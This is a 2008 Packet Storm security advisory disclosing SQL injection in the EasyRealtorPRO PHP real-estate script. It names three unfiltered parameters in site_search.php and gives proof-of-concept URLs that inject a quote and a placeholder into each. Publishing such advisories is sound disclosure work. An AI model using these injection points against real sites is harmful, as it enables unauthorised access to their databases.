easyrealtor-sql.txt

2008-09-25T00:00:00
ID PACKETSTORM:70356
Type packetstorm
Reporter SmOk3
Modified 2008-09-25T00:00:00

Description

                                        
                                            `Original article:  
http://www.davidsopas.com/2008/09/sql-injection-in-easyrealtorpro/  
  
  
"EasyRealtorPRO 2008 provides you with all features you need to setup  
your own business oriented real estate website on your own domain  
name. Our support team will install the script on your server and then  
you can start selling packages to home sellers at ease." in vendor  
website easyrealtorpro.com  
  
This PHP script is vulnerable to SQL Injection in site_search.php file.  
  
Manipulating the unfiltred variables, a user can execute SQL commands  
to gather other information. The problem is located under the  
variables item, search_ordermethod and search_order.  
  
Proof of concept:  
  
site_search.php?search_purpose=sale&search_type=&  
search_price_min=&search_price_max=&search_bedroom=1&  
search_bathroom=1&search_city=&search_state=&  
search_zip=&search_radius=&search_country=&  
search_order=type&search_ordermethod=asc&page=2&  
item=5'SQL INJECTION  
  
site_search.php?search_purpose=sale&search_type=&  
search_price_min=&search_price_max=&search_bedroom=1&  
search_bathroom=1&search_city=&search_state=&  
search_zip=&search_radius=&search_country=&  
search_order=type&search_ordermethod=asc'SQL INJECTION&  
page=2&item=5  
  
site_search.php?search_purpose=sale&search_type=&  
search_price_min=&search_price_max=&search_bedroom=1&  
search_bathroom=1&search_city=&search_state=&  
search_zip=&search_radius=&search_country=&  
search_order=type'SQL INJECTION&search_ordermethod=asc&  
page=2&item=5  
  
Solution: The vendor was contacted 2 weeks ago and still not reply to  
my email. It can be fixed with the sanitize of the variables.  
`